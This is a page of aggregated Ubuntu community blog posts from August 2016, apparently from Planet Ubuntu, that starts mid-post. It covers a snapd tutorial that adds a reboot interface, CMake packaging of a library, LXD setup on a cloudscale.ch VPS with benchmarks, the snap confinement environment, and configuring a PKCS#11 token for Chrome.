A permanent snippet is always there as long as a plug or a slot exists. Typically this is used on snaps other than the core snap (e.g. a service provider that is packaged as a snap) to allow the service to run. Examples of such services could include network-manager, modem-manager, docker, lxd, x11 any anything like that. The granted permissions allow the service to operate as well as to create a communication channel (typically a socket or a DBus bus name) that clients can connect to.

Connection based snippet is only applied when a connection (interface connection) is made. This permission is given to the client and typically involves basic IPC system calls as well as a permission to open a given socket (e.g. the X11 socket) or use specific DBus methods and objects.

A special class of connection snippets exist for things that don't involve a client application talking to a server application but rather a program using given kernel services. The prime example of this use case is the network interface which grants access to several network system calls. This interface grants nothing to the slot, just to connected plugs.

Today we will explore that last case. Our hello interface will give us access to a system call that is usually forbidden, reboot

The graceful-reboot snap


For the purpose of this exercise I wrote a tiny C program that uses the reboot() function. The whole program is reproduced below, along with appropriate build support for snapcraft.

graceful-reboot.c


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/reboot.h>
#include <linux reboot.h>
#include <errno.h>


int main() {
sync();
if (reboot(LINUX_REBOOT_CMD_RESTART) != 0) {
switch (errno) {
case EPERM:
printf("Insufficient permissions to reboot the system\n");
break;
default:
perror("reboot()");
break;
}
return EXIT_FAILURE;
}
printf("Reboot requested\n");
return EXIT_SUCCESS;
}

Makefile


TIP: Makefiles rely on differences between tabs and spaces. When copy pasting this sample you need to ensure that tabs are preserved in the clean and install rules

CFLAGS += -Wall
.PHONY: all
all: graceful-reboot
.PHONY: clean
clean:
rm -f graceful-reboot
graceful-reboot: graceful-reboot.c
.PHONY: install
install: graceful-reboot
install -d $(DESTDIR)/usr/bin
install -m 0755 graceful-reboot $(DESTDIR)/usr/bin/graceful-reboot

snapcraft.yaml


name: graceful-reboot
version: 1
summary: Reboots the system gracefully
description: |
This snap contains a graceful-reboot application that requests the system
to reboot by talking to the init daemon. The application uses a custom
"hello" interface that is developed as a part of a tutorial.
confinement: strict
apps:
graceful-reboot:
command: graceful-reboot
plugs: [hello]
parts:
main:
plugin: make
source: .

We now have everything required. Now let's use snapcraft to build this code and get our snap ready. I'd like to point out that we use confinement: strict. This tells snapcraft and snapd that we really really don't want to run this snap in devmode where all sandboxing is off. Doing so would defeat the purpose of adding the new interface.

Let's install the snap and try it out:

$ snapcraft

$ sudo snap install ./graceful-reboot_1_amd64.snap

Ready? Let's run the command now (don't worry, it won't reboot)

$ graceful-reboot
Bad system call

Aha! That's what we are here to fix. As we know from part [4] that seccomp, which is a part of the sandbox system, blocks all system calls that are not explicitly allowed. We can check the system log to see what the actual error message was to figure out which system call need to be added.

Looking through journalctl -n 100 (last 100 messages) I found this:

sie 10 09:47:02 x200t audit[13864]: SECCOMP auid=1000 uid=1000 gid=1000 ses=2 pid=13864 comm="graceful-reboot" exe="/snap/graceful-reboot/x1/usr/bin/graceful-reboot" sig=31 arch=c000003e syscall=169 compat=0 ip=0x7f7ef30dcfd6 code=0x0

Decoding this is rather cryptic message is actually pretty easy. The key fact we are after is the system call number. Here it is 169. Which symbolic system call is that? We can use the scmp_sys_resolver program to find out.

$ scmp_sys_resolver 169
reboot

Bingo. While this case was pretty obvious, library functions don't always map to system call names directly. There are often cases where system calls evolve to gain additional arguments, flags and what not and the name of the library function is not changed.

Adjusting the hello^Hreboot interface


At this stage we can iterate on our interface. We have a test case (the snap we just wrote), we have the means to change the code (editing the hello.go file) and to make it live in the system (the refresh-bits command).

Let's patch our interface to be a little bit more meaningful now. We will rename it from hello to reboot. This will affect the file name, the type name and the string returned from Name(). We will also grant a connected plug permission, through the seccomp security backend, to the use the reboot system call. You can try to make the necessary changes yourself but I provide the essential part of the  patch below. The key thing to keep in mind is that ConnectedPlugSnippet method must return, when asked about SecuritySecComp, the name of the system call to allow, like this []byte(`reboot`).

diff --git a/interfaces/builtin/reboot.go b/interfaces/builtin/reboot.go
index 91962e1..ba7a9e3 100644
--- a/interfaces/builtin/reboot.go
+++ b/interfaces/builtin/reboot.go
@@ -91,7 +91,7 @@ func (iface *RebootInterface) PermanentSlotSnippet(slot *interfaces.Slot, securi
func (iface *RebootInterface) ConnectedPlugSnippet(plug *interfaces.Plug, slot *interfaces.Slot, securitySystem interfaces.SecuritySystem) ([]byte, error) {
switch securitySystem {
case interfaces.SecurityAppArmor:
return nil, nil
case interfaces.SecuritySecComp:
-               return nil, nil
+ return []byte(`reboot`), nil
case interfaces.SecurityDBus:

We can now return to the terminal that had refresh-bits running, interrupt the running command with control-c and simply re-start the whole command again. This will build the updated copy of snapd.

Surely enough, if we now ask snap about known interfaces we will see the reboot interface.

Let's now update the graceful-reboot snap to talk about the reboot interface and re-install it (note that you don't have to change the version string at all, just re-install the rebuilt snap). If we ask snapd about interfaces now we will see that the core snap exposes the reboot slot and the graceful-reboot snap has a reboot plug but they are disconnected.



Let's connect them now.

sudo snap connect graceful-reboot:reboot ubuntu-core:reboot

Let's ensure that it worked by running the interfaces command again:

$ sudo snap interfaces | grep reboot
:reboot              graceful-reboot

Success!

Now before we give it a try, let's have a look at the generated seccomp profile. The profile is derived from the base seccomp template that is a part of snapd source code and the set of plugs, slots and connections made to or from this snap. Each application of each snap gets a profile, we can see that for ourselves by looking at
/var/lib/snapd/seccomp/profiles/snap.graceful-reboot.graceful-reboot

$ grep reboot /var/lib/snapd/seccomp/profiles/snap.graceful-reboot.graceful-reboot
reboot

There are a few gotchas that we should point out though:

  • Security profiles are derived from interfaces but are only changed when a new connection is made (and that connection affects a particular snap), when the snap is initially installed or every time it is updated.
  • In practice we will either disconnect / reconnect the hello interface or reinstall the snap (whichever is more convenient)
  • Snapd remembers connections that were made explicitly and will re-establish them across snap updates. If you rename an interface while working on it, snapd may print a message (to system log, not to the console) about being unable to reconnect the "hello" interface because that interface no longer exists in snapd. To make snapd forget all those connections simply remove and reinstall the affected snap.
  • You can experiment by editing seccomp profiles directly. Just edit the file mentioned above and add additional system calls. Once you are happy with the result you can adjust snapd source code to match.
  • You can also do that with apparmor profiles but you have to re-load the profile into the kernel each time using the command apparmor_parser -r /path/to/the/profile

Okay, so did it work? Let's try the graceful-reboot command again.

$ graceful-reboot
Insufficient permissions to reboot the system

The process didn't get killed straight away but the reboot call didn't work yet either. Let's look at the system log and see if there are any hints.

sie 10 10:25:55 x200t kernel: audit: type=1400 audit(1470817555.936:47): apparmor="DENIED" operation="capable" profile="snap.graceful-reboot.graceful-reboot" pid=14867 comm="graceful-reboot" capability=22  capname="sys_boot"

This time we could use the system call but apparmor stepped in and said that we need the sys_boot capability. Let's modify the interface to allow that then. The precise apparmor syntax for this is "capability sys_boot,". You absolutely have to include the trailing comma. It was my most common mistake when hacking on apparmor profiles.

Let's patch the interface and re-run refresh-bits and re-install the snap. You can see the patch I applied below

diff --git a/interfaces/builtin/reboot.go b/interfaces/builtin/reboot.go
index 91962e1..ba7a9e3 100644
--- a/interfaces/builtin/reboot.go
+++ b/interfaces/builtin/reboot.go
@@ -91,7 +91,7 @@ func (iface *RebootInterface) PermanentSlotSnippet(slot *interfaces.Slot, securi
func (iface *RebootInterface) ConnectedPlugSnippet(plug *interfaces.Plug, slot *interfaces.Slot, securitySystem interfaces.SecuritySystem) ([]byte, error) {
switch securitySystem {
case interfaces.SecurityAppArmor:
- return nil, nil
+ return []byte(`capability sys_boot,`), nil
case interfaces.SecuritySecComp:
return []byte(`reboot`), nil
case interfaces.SecurityDBus:

TIP: I'm using sudo with a full path because of a bug in sudo where /snap/bin is not kept on the path.

Warning: the next command will reboot your system straight away!

$ sudo /snap/bin/graceful-reboot

Final touches


Since interfaces like this are very common, snapd has some support for writing less repetitive code. The exactly identical interface can be written with just this short snippet

// NewRebootInterface returns a new "reboot" interface.
func NewRebootInterface() interfaces.Interface {
return &commonInterface{
name: "reboot",
connectedPlugAppArmor: `capability sys_boot,`,
connectedPlugSecComp: `reboot`,
reservedForOS: true,
}
}

Everywhere where we used to say &RebootInterface{} we can now say NewRebootInterface(). The abbreviation helps in code reviews and in just conveying the meaning and intent of the interface.

You can find the source code of this interface in my github repository. The code of the graceful reboot snap is here. Feel free to comment below, or on Google+ or ask me questions directly.
on August 10, 2016 10:04 AM

August 09, 2016

Using a C++ library, particularly a 3rd party one, can be complicated affair. Library binaries compiled on Windows/OSX/Linux can not simply be copied over to another platform and used there. Linking works differently, compilers bundle different code into binaries on each platform etc.

This is not an insurmountable problem. Libraries like Qt distribute dynamically compiled binaries for major platforms and other libraries have comparable solutions.

There is a category of libraries which considers the portable binaries issue to be a terminal one. Boost is a widespread source of many ‘header only’ libraries, which don’t require a user to link to a particular platform-compatible library binary. There are also many other examples of such ‘header only’ libraries.

Recently there was a blog post describing an example library which can be built as a shared library, or as a static library, or used directly as a ‘header only’ library which doesn’t require the user to link against anything to use the library. The claim is that it is useful for libraries to provide users the option of using a library as a ‘header only’ library and adding preprocessor magic to make that possible.

However, there is yet a fourth option, and that is for the consumer to compile the source files of the library themselves. This has the
advantage that the .cpp file is not #included into every compilation unit, but still avoids the platform-specific library binary.

I decided to write a CMake buildsystem which would achieve all of that for a library. I don’t have an opinion on whether good idea in general for libraries to do things like this, but if people want to do it, it should be easy as possible.

Additionally, of course, the CMake GenerateExportHeader module should be used, but I didn’t want to change the source from Vittorio so much.

The CMake code below compiles the library in several ways and installs it to a prefix which is suitable for packaging:

cmake_minimum_required(VERSION 3.3)

project(example_lib)

# define the library

set(library_srcs
    example_lib/library/module0/module0.cpp
    example_lib/library/module1/module1.cpp
)

add_library(library_static STATIC ${library_srcs})
add_library(library_shared SHARED ${library_srcs})

add_library(library_iface INTERFACE)
target_compile_definitions(library_iface
    INTERFACE LIBRARY_HEADER_ONLY
)

set(installed_srcs
    include/example_lib/library/module0/module0.cpp
    include/example_lib/library/module1/module1.cpp
)
add_library(library_srcs INTERFACE)
target_sources(library_srcs INTERFACE
    $<INSTALL_INTERFACE:${installed_srcs}>
)

# install and export the library

install(DIRECTORY
    example_lib/library
  DESTINATION
    include/example_lib
)
install(FILES
    example_lib/library.hpp
    example_lib/api.hpp
  DESTINATION
    include/example_lib
)
install(TARGETS
    library_static
    library_shared
    library_iface
    library_srcs
  EXPORT library_targets
  RUNTIME DESTINATION bin
  ARCHIVE DESTINATION lib
  LIBRARY DESTINATION lib
  INCLUDES DESTINATION include
)
install(EXPORT library_targets
  NAMESPACE example_lib::
  DESTINATION lib/cmake/example_lib
)

install(FILES example_lib-config.cmake
  DESTINATION lib/cmake/example_lib
)

This blog post is not a CMake introduction, so to see what all of those commands are about start with the cmake-buildsystem and cmake-packages documentation.

There are 4 add_library calls. The first two serve the purpose of building the library as a shared library and then as a static library.

The next two are INTERFACE libraries, a concept I introduced in CMake 3.0 when it looked like Boost might use CMake. The INTERFACE target can be used to specify header-only libraries because they specify usage requirements for consumers to use, such as include directories and compile definitions.

The library_iface library functions as described in the blog post from Vittorio, in that users of that library will be built with LIBRARY_HEADER_ONLY and will therefore #include the .cpp files.

The library_srcs library causes the consumer to compile the .cpp files separately.

A consumer of a library like this would then look like:

cmake_minimum_required(VERSION 3.3)

project(example_user)

find_package(example_lib REQUIRED)

add_executable(myexe
    src/src0.cpp
    src/src1.cpp
    src/main.cpp
)

## uncomment only one of these!
# target_link_libraries(myexe 
#     example_lib::library_static)
# target_link_libraries(myexe
#     example_lib::library_shared)
# target_link_libraries(myexe
#     example_lib::library_iface)
target_link_libraries(myexe
     example_lib::library_srcs)

So, it is up to the consumer how they consume the library, and they determine that by using target_link_libraries to specify which one they depend on.


on August 09, 2016 08:00 PM

In previous posts, we saw how to configure LXD/LXC containers on a VPS on DigitalOcean and Scaleway. There are many more VPS companies.

cloudscale.ch is one more company that provides Virtual Private Servers (VPS). They are based in Switzerland.

In this post we are going to see how to create a VPS on cloudscale.ch and configure to use LXD/LXC containers.

We now use the term LXD/LXC containers (instead of LXC containers in previous articles) in order to show the LXD is a management service for LXC containers; LXD works on top of LXC. Somewhat similar to GNU/Linux where GNU software is running over the Linux kernel.

Set up the VPS

cloudscale1

We are creating a VPS called myubuntuserver, using the Flex-2 Compute Flavor. This is the most affordable, at 2GB RAM with 1 vCPU core. It costs 1 CHF, which is about 0.92€ (or US$1).

The default capacity is 10GB, which is included in the 1 CHF per day. If you want more capacity, there is extra charging.

cloudscale2

We are installing Ubuntu 16.04 and accept the rest of the default settings. Currently, there is only one server location at Rümlang, near Zurich (the capital city of Switzerland).

cloudscale4

Here is the summary of the freshly launched VPS server. The IP address is shown as well.

Connect and update the VPS

In order to connect, we need to SSH to that IP address using the fixed username ubuntu. There is an option to either password authentication or public-key authentication. Let’s connect.

myusername@mycomputer:~$ ssh ubuntu@5.102.145.245
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-24-generic x86_64)

* Documentation: https://help.ubuntu.com/

Get cloud support with Ubuntu Advantage Cloud Guest:
 http://www.ubuntu.com/business/services/cloud

0 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@myubuntuserver:~$

Let’s update the package list,

ubuntu@myubuntuserver:~$ sudo apt update
Hit:1 http://ch.archive.ubuntu.com/ubuntu xenial InRelease
Get:2 http://ch.archive.ubuntu.com/ubuntu xenial-updates InRelease [95.7 kB]
...
Get:31 http://security.ubuntu.com/ubuntu xenial-security/multiverse amd64 Packages [1176 B]
Fetched 10.5 MB in 2s (4707 kB/s) 
Reading package lists... Done
Building dependency tree 
Reading state information... Done
67 packages can be upgraded. Run 'apt list --upgradable' to see them.
ubuntu@myubuntuserver:~$ sudo apt upgrade
Reading package lists... Done
Building dependency tree 
...
Processing triggers for libc-bin (2.23-0ubuntu3) ...
ubuntu@myubuntuserver:~$

In this case, we updated 67 packages, among which was lxd. It was important to perform the upgrade of packages.

Configure LXD/LXC

Let’s see how much free disk space is there,

ubuntu@myubuntuserver:~$ df -h /
Filesystem Size Used Avail Use% Mounted on
/dev/vda1  9.7G 1.2G  8.6G 12%  /
ubuntu@myubuntuserver:~$

There is 8.6GB of free space, let’s allocate 5GB of that for the ZFS pool. First, we need to install the package zfsutils-linux. Then, initialize lxd.

ubuntu@myubuntuserver:~$ sudo apt install zfsutils-linux
Reading package lists... Done
...
Processing triggers for ureadahead (0.100.0-19) ...
ubuntu@myubuntuserver:~$ sudo lxd init
Name of the storage backend to use (dir or zfs): zfs
Create a new ZFS pool (yes/no)? yes
Name of the new ZFS pool: myzfspool
Would you like to use an existing block device (yes/no)? no
Size in GB of the new loop device (1GB minimum): 5
Would you like LXD to be available over the network (yes/no)? no
Do you want to configure the LXD bridge (yes/no)? yes
...accept the network autoconfiguration settings that you will be asked...
LXD has been successfully configured.
ubuntu@myubuntuserver:~$

That’s it! We are good to go and configure our first LXD/LXC container.

Testing a container as a Web server

Let’s test LXD/LXC by creating a container, installing nginx and accessing from remote.

ubuntu@myubuntuserver:~$ lxc launch ubuntu:x web
Creating web
Retrieving image: 100%
Starting web
ubuntu@myubuntuserver:~$

We launched a container called web.

Let’s connect to the container, update the package list and upgrade any available packages.

ubuntu@myubuntuserver:~$ lxc exec web -- /bin/bash
root@web:~# apt update
Hit:1 http://archive.ubuntu.com/ubuntu xenial InRelease
...
9 packages can be upgraded. Run 'apt list --upgradable' to see them.
root@web:~# apt upgrade
Reading package lists... Done
...
Processing triggers for initramfs-tools (0.122ubuntu8.1) ...
root@web:~#

Still inside the container, we install nginx.

root@web:~# apt install nginx
Reading package lists... Done
...
Processing triggers for ufw (0.35-0ubuntu2) ...
root@web:~#

Let’s make a small change in the default index.html,

root@web:/var/www/html# diff -u /var/www/html/index.nginx-debian.html.ORIGINAL /var/www/html/index.nginx-debian.html
--- /var/www/html/index.nginx-debian.html.ORIGINAL 2016-08-09 17:08:16.450844570 +0000
+++ /var/www/html/index.nginx-debian.html 2016-08-09 17:08:45.543247231 +0000
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
 <head>
-<title>Welcome to nginx!</title>
+<title>Welcome to nginx on an LXD/LXC container on Ubuntu at cloudscale.ch!</title>
 <style>
 body {
 width: 35em;
@@ -11,7 +11,7 @@
 </style>
 </head>
 <body>
-<h1>Welcome to nginx!</h1>
+<h1>Welcome to nginx on an LXD/LXC container on Ubuntu at cloudscale.ch!</h1>
 <p>If you see this page, the nginx web server is successfully installed and
 working. Further configuration is required.</p>
 
root@web:/var/www/html#

Finally, let’s add a quick and dirty iptables rule to make the container accessible from the Internet.

root@web:/var/www/html# exit
ubuntu@myubuntuserver:~$ lxc list
+------+---------+---------------------+------+------------+-----------+
| NAME | STATE   | IPV4                | IPV6 | TYPE       | SNAPSHOTS |
+------+---------+---------------------+------+------------+-----------+
| web  | RUNNING | 10.5.242.156 (eth0) |      | PERSISTENT | 0         |
+------+---------+---------------------+------+------------+-----------+
ubuntu@myubuntuserver:~$ ifconfig ens3
ens3 Link encap:Ethernet HWaddr fa:16:3e:ad:dc:2c 
 inet addr:5.102.145.245 Bcast:5.102.145.255 Mask:255.255.255.0
 inet6 addr: fe80::f816:3eff:fead:dc2c/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
 RX packets:102934 errors:0 dropped:0 overruns:0 frame:0
 TX packets:35613 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000 
 RX bytes:291995591 (291.9 MB) TX bytes:3265570 (3.2 MB)

ubuntu@myubuntuserver:~$

Therefore, the iptables command that will allow access to the container is,

ubuntu@myubuntuserver:~$ sudo iptables -t nat -I PREROUTING -i ens3 -p TCP -d 5.102.145.245/32 --dport 80 -j DNAT --to-destination 10.5.242.156:80
ubuntu@myubuntuserver:~$

Here is the result when we visit the new Web server from our computer,

cloudscale-nginx

Benchmarks

We are benchmarking the CPU, the memory and the disk. Note that our VPS has a single vCPU.

CPU

We are benchmarking the CPU using sysbench with the following parameters.

ubuntu@myubuntuserver:~$ sysbench --num-threads=1 --test=cpu run
sysbench 0.4.12: multi-threaded system evaluation benchmark

Running the test with following options:
Number of threads: 1

Doing CPU performance benchmark

Threads started!
Done.

Maximum prime number checked in CPU test: 10000


Test execution summary:
 total time: 10.9448s
 total number of events: 10000
 total time taken by event execution: 10.9429
 per-request statistics:
 min: 0.96ms
 avg: 1.09ms
 max: 2.79ms
 approx. 95 percentile: 1.27ms

Threads fairness:
 events (avg/stddev): 10000.0000/0.00
 execution time (avg/stddev): 10.9429/0.00

ubuntu@myubuntuserver:~$

The total time for the CPU benchmark with one thread was 10.94s. With two threads, it was 10.23s. With four threads, it was 10.07s.

Memory

We are benchmarking the memory using sysbench with the following parameters.

ubuntu@myubuntuserver:~$ sysbench --num-threads=1 --test=memory run
sysbench 0.4.12: multi-threaded system evaluation benchmark

Running the test with following options:
Number of threads: 1

Doing memory operations speed test
Memory block size: 1K

Memory transfer size: 102400M

Memory operations type: write
Memory scope type: global
Threads started!
Done.

Operations performed: 104857600 (1768217.45 ops/sec)

102400.00 MB transferred (1726.77 MB/sec)


Test execution summary:
 total time: 59.3013s
 total number of events: 104857600
 total time taken by event execution: 47.2179
 per-request statistics:
 min: 0.00ms
 avg: 0.00ms
 max: 0.80ms
 approx. 95 percentile: 0.00ms

Threads fairness:
 events (avg/stddev): 104857600.0000/0.00
 execution time (avg/stddev): 47.2179/0.00

ubuntu@myubuntuserver:~$

The total time for the memory benchmark with one thread was 59.30s. With two threads, it was 62.17s. With four threads, it was 62.57s.

Disk

We are benchmarking the disk using dd with the following parameters.

ubuntu@myubuntuserver:~$ dd if=/dev/zero of=testfile bs=1M count=1024 oflag=dsync
1024+0 records in
1024+0 records out
1073741824 bytes (1,1 GB, 1,0 GiB) copied, 21,1995 s, 50,6 MB/s
ubuntu@myubuntuserver:~$

 

 

It took about 21 seconds to create 1024 files of 1MB each, with the DSYNC flag. The throughput was 50.6MB/s. Subsequent invocation were around 50MB/s as well.

ZFS pool free space

Here is the free space in the ZFS pool after one container, that one with nginx and other packages updated,

ubuntu@myubuntuserver:~$ sudo zpool list
NAME       SIZE ALLOC  FREE EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOT
myzfspool 4,97G  811M 4,18G        -  11% 15% 1.00x ONLINE       -
ubuntu@myubuntuserver:~$

Again, after a second container was just created, (new and empty)

ubuntu@myubuntuserver:~$ sudo zpool list
NAME       SIZE ALLOC  FREE EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOT
myzfspool 4,97G  822M 4,17G        -  11% 16% 1.00x ONLINE       -
ubuntu@myubuntuserver:~$

Thanks for Copy-on-Write with ZFS, the new containers do not take up much space. The files that are added or updated, would contribute to the additional space.

Conclusion

We saw how to launch an Ubuntu 16.04 VPS on cloudscale.ch, then configure LXD.

We created a container with nginx, and configured iptables so that the Web server is accessible from the Internet.

Finally, we see some benchmarks for the vCPU, the memory and the disk.

on August 09, 2016 05:26 PM

I hope you'll enjoy a shiny new 6-part blog series I recently published at Linux.com.
  1. The first article is a bit of back story, perhaps a behind-the-scenes look at the motivations, timelines, and some of the work performed between Microsoft and Canonical to bring Ubuntu to Windows.
  2. The second article is an updated getting-started guide, with screenshots, showing a Windows 10 user exactly how to enable and run Ubuntu on Windows.
  3. The third article walks through a dozen or so examples of the most essential command line utilities a Windows user, new to Ubuntu (and Bash), should absolutely learn.
  4. The fourth article shows how to write and execute your first script, "Howdy, Windows!", in 6 different dynamic scripting languages (Bash, Python, Perl, Ruby, PHP, and NodeJS).
  5. The fifth article demonstrates how to write, compile, and execute your first program in 7 different compiled programming languages (C, C++, Fortran, Golang).
  6. The sixth and final article conducts some performance benchmarks of the CPU, Memory, Disk, and Network, in both native Ubuntu on a physical machine, and Ubuntu on Windows running on the same system.
I really enjoyed writing these.  Hopefully you'll try some of the examples, and share your experiences using Ubuntu native utilities on a Windows desktop.  You can find the source code of the programming examples in Github and Launchpad:
Cheers,
Dustin
on August 09, 2016 01:26 PM

Welcome to the Ubuntu Weekly Newsletter. This is issue #477 for the week August 1 – 7, 2016, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Simon Quigley
  • Chris Guiver
  • Athul Muralidhar
  • Chris Sirrs
  • Aaron Honeycutt
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

on August 09, 2016 02:42 AM

August 08, 2016

Snap execution environment

Zygmunt Krynicki


This is the fourth article in the series about snappy interfaces. You can check out articles one, two and three though they are not directly required.

In this installment we will explore the layout and properties of the file system at the time snap application is executed. From the point of view of the user nothing special is happening. The user either runs an application by clicking on a desktop icon or by running a shell command. Internally, snapd uses a series of steps (which I will not explain today as they are largely an implementation detail) to configure the application process.

The (ch)root filesystem and a bit of magic


Let’s start with the most important fact: the root filesystem is not the filesystem of the host distribution. Using the host filesystem would lead to lots of inconsistencies. Those are rather obvious: different base libraries, potentially different filesystem layout, etc. At snap application runtime the root filesystem is changed to the core snap itself. You can think of this as a kind of chroot. Obviously the chroot itself would be insufficient as snaps are read only filesystems and the core snap is no different.

Certain directories in the core snap are bind mounted (you can think of this as a special type of a symbolic link or a hard link to a directory though neither are fully accurate) to locations on the host file system. This includes the /home directory, the /run directory and a few others (see Appendix A for the full list). Notably this does not include the /usr/lib or /usr/bin. If a snap needs a library or an executable to function, that library or executable has to be present in the snap itself. The only exception to that are very low level libraries like libc that are present in the core snap.

TIP: explore the core snap to see what is there. Having installed at least one snap you can go to /snap/ubuntu-core/current to see the list of files provided there.

With all those mounts and chroots in place one might wonder how mounts look like for all the other processes in the system? The answer is simple, they look as if nothing special related to snappy was happening.

To understand the answer you have to know a little about Linux namespaces. Namespaces are a way to create a separate view of a given aspect of a Linux system at a per-process level. Unlike full-blown virtual machines (where you run a whole emulated computer with a potentially different operating system kernel and emulated peripheral devices) namespaces are fine grained. Snappy uses just one of the available namespaces, the mount namespace. Now I won’t fool you, while the idea seems simple “mounts in the namespace are isolated from the mounts outside of the namespace” the reality is far more complex because of the so-called shared-subtrees. One interesting consequence is that mounts performed after a snap application is stated (e.g. in the /media directory) are visible to the said application (e.g. to VLC) while the reverse is not true. If a malicious snap tries (and manages despite various defenses put in place) to mount something in say, /usr/ that change will be visible only to the snap application process.

Don’t worry if you don’t fully understand this topic. The main point is that your application sees a different view of the filesystem but that view is consistent across distributions.

TIP: you may have seen the core snap as it looks like on disk if you followed the earlier tip. Now see the real file system at runtime! Install the snapd-hacker-toolbelt snap and run snapd-hacker-toolbelt.busybox sh. This will give you a shell with many of the familiar commands that let you peek and poke at the environment.
Now there are a few more tweaks I should point out but won’t go into too much detail:


  • Each process gets a private /tmp directory with a fresh tmpfs mounted there. This is a security measure. One simple consequence is that you cannot expect to share files by dropping them there and that you cannot create arbitrarily large files there since tmpfs is backed by a fraction of available system memory.
  • There’s also a private instance of /dev/pts directory with pseudo terminal emulators. This is an another security measure. In practice you will not care about this much. It’s just a part of the Linux plumbing that has to be setup in a given way.
  • The whole host filesystem is mounted at /var/lib/snapd/hostfs. This can be used by interfaces similar to the content sharing interface, for example. This is super interesting and we will devote a whole article to using this later on.
  • There’s special code that exists to support Nvidia proprietary drivers. I will discuss this with a separate installment that may be of interest to game developers.
  • The current working directory may be impossible to preserve across the whole chroot and mount and bind mount magic. The easiest way to experience this is to create a directory in /tmp (e.g. /tmp/foo) and try to run any snap command there. Because of the private (and empty) /tmp directory the /tmp/foo directory does not exist for the snap application process. Snap-confine will print an informative error message and refuse to run.

This now much more comfortable. Many of the usual places exist and contain the data the applications are familiar with. This doesn’t mean those directories are readable or writable to the application process, they are just present. Confinement and interfaces decide if something is readable or writable. This brings us to the second big part of snap-confine

Process confinement

Snap-confine (as of version 1.0.39) supports two sandboxing technologies: seccomp and apparmor.

Seccomp is used to constrain system calls that an application can use. System calls are the interface between the kernel and user space. If you are unfamiliar with the concept then don’t worry. In very rough terms some of the functions of your programming language are implemented as as system calls and seccomp is the linux subsystem that is responsible for mediating access to them.

Right now when your application runs in devmode you will not get any advice on the system calls you are relying on that are not allowed by the set of used interfaces. The so-called complain mode of seccomp is being actively developed upstream so the situation may change by the time you are reading this.

In strict confinement any attempt to use a disallowed system call will instantly kill the offending process. This is accompanied by a rather cryptic message that you can see in the system log:
sie 08 12:36:53 gateway kernel: audit: type=1326 audit(1470652613.076:27): auid=1000 uid=1000 gid=1000 ses=63 pid=66834 comm="links" exe="/snap/links/2/usr/bin/links" sig=31 arch=c000003e syscall=54 compat=0 ip=0x7f8dcb8ffc8a code=0x0
What this tells us is that process ID 66834 was killed with signal 31 (SIGSYS) because it tried to use system call 54 (setsockopt) Note that system call numbers are architecture specific. The output above was from an amd64 machine.

Even when a system call is allowed the particular operation may be intercepted and denied by apparmor. For example, the sandbox is setup so that applications can freely write to $SNAP_USER_DATA (or $SNAP_DATA for services) but cannot, by default, either read or write from the real home directory.
sie 08 12:56:40 gateway kernel: audit: type=1400 audit(1470653800.724:28): apparmor="DENIED" operation="open" profile="snap.snapd-hacker-toolbelt.busybox" name="/home/zyga/.ssh/authorized_keys" pid=67013 comm="busybox" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000

Here we see that process ID 67013 tried to “open” /home/zyga/.ssh/authorized_keys and that the “r” (read) mask was denied. In devmode that is obviously allowed but is accompanied with an appropriate warning message instead.

TIP: Whenever you run into problems like this you should give the snappy-debug snap a try. It is designed to read and understand messages like that and give you useful advice.

Apparmor has much wider feature set and can perform checks for linux capabilities, traditional UNIX IPC like signals and sockets, DBus messages (including details of the object and method invoked). The vast majority of the current snap confinement is made with apparmor profiles. We will look at all the features in greater detail in the next few articles in this series where we will actively implement simple new interfaces from scratch.

There's one last thing that snap-confine does, in some cases is creates...

A device control group

In certain cases a device control group is created and the application process is moved there. The control group has only a small set of typical device nodes (e.g. /dev/null) and explicitly defined additional devices. This is done by using udev rules to tag appropriate devices. This is listed for completeness, you should never worry about or even think about this topic. Once the need arises we will explore it and how it can be used to simplify handling of certain situations. Again, by default there is no device control group being used.

Putting it all together

With all of those changes in place snap-confine executes (using execv) a wrapper script corresponding to the application command entry in the snapcraft.yaml file. This happens each time you run an application.

If you are interested in learning more about snap-confine I encourage you to check out its manual page (snap-confine.5) and source code. If you have any questions please feel free to ask at the snapcraft.io mailing list or using comments on this blog below.

Next time we will look at creating our first, extremely simple, interface in practice.

Appendix A: List of host directories that are bind-mounted.

NOTE: This list will slowly get less and less accurate as more of the mount points become dynamic and controlled by available interfaces.
  • /dev
  • /etc (except for /etc/alternatives)
  • /home
  • /root
  • /proc
  • /snap
  • /sys
  • /var/snap
  • /var/lib/snapd
  • /var/tmp
  • /var/log
  • /run
  • /media
  • /lib/modules
  • /usr/src
on August 08, 2016 03:14 PM

Using PKCS#11 on GNU/Linux

Paul Tagliamonte

PKCS#11 is a standard API to interface with HSMs, Smart Cards, or other types of random hardware backed crypto. On my travel laptop, I use a few Yubikeys in PKCS#11 mode using OpenSC to handle system login. libpam-pkcs11 is a pretty easy to use module that will let you log into your system locally using a PKCS#11 token locally.

One of the least documented things, though, was how to use an OpenSC PKCS#11 token in Chrome. First, close all web browsers you have open.

sudo apt-get install libnss3-tools

certutil -U -d sql:$HOME/.pki/nssdb
modutil -add "OpenSC" -libfile /usr/lib/x86_64-linux-gnu/opensc-pkcs11.so -dbdir sql:$HOME/.pki/nssdb
modutil -list "OpenSC" -dbdir sql:$HOME/.pki/nssdb 
modutil -enable "OpenSC" -dbdir sql:$HOME/.pki/nssdb

Now, we'll have the PKCS#11 module ready for nss to use, so let's double check that the tokens are registered:

certutil -U -d sql:$HOME/.pki/nssdb
